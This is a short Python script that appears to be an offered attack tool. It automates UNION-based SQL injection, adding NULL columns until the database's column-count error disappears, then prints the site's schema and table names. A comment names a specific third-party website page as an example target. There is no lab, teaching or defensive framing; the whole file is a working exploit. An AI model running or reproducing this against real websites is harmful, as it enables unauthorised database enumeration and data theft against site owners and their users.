1# pip install requests
2import requests
3
4def main():
5 # http://www.meggieschneider.com/php/detail.php?id=48
6 url = input('Target: ')
7 idx = 0
8 while True:
9 nulls = ', '.join([f'Null as Col{x}' for x in range(idx)])
10 if idx > 0:
11 nulls = ', ' + nulls
12 req = f'id=48 AND 1=2 UNION SELECT table_schema, table_name {nulls} FROM information_schema.tables'
13 print(f'''\n
14 {req}
15 ''')
16 r = requests.get(f'{url}?{req}')
17 if 'The used SELECT statements have a different number of columns' not in str(r.content):
18 print(f'''\n
19 {r.text}
20 ''')
21 break
22 idx = idx + 1
23
24if __name__ == '__main__':
25 main()